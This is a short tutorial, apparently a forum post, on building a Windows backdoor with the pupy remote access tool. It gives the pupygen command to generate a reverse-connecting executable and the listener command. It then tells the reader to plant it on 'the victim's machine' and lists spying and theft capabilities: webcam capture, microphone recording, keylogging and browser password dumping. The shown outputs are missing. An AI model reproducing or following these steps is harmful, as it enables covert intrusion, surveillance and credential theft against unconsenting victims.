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How to make a Backdoor with pupy

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Let's begin

1. The first step is to open your terminal and then cd into the pupy directory where you put, and then enter as root

Cod:  cd /c/tools/rat/pupy/pupy/ 

2.Now, let's create a simple windows x86 backdoor, execute this command

Cod:  ./pupygen.py -f exe_x86 -o backdoor.exe connect --host -t tcp_cleartext


The output will be like this:



f you're getting the output just like mine it means you're on the right path ready to rock and roll 

3. Pupy has it own listener called 'pupy shell', so let's start our listener. Run this command :

Cod: ./pupysh.py -p 9999 -t tcp_cleartext

* -p is the port that pupy shell wil listen
* -t is the transport layer that we wanna use, be sure to use the right transport , it should be the same as the backdoor we generate before


The output will be like this:



4. Now your job is to put the backdoor in the victim's machine and then execute it

5. Wait until you get session like this


6. Do whatever you want, you can see the available modules with list_modules command


If you wanna run the module you just have to type 'run category/module'
An example running a troll message box module

Cod: >>> run troll/msgbox --title error "pwned by pupy"


You can also take a snapshot from the victim's webcam, record microphone scanning keystrokes, dumping password from browsers and much more as this project is growing up.
You can also generate backdoor to connect your vps or your ddns!

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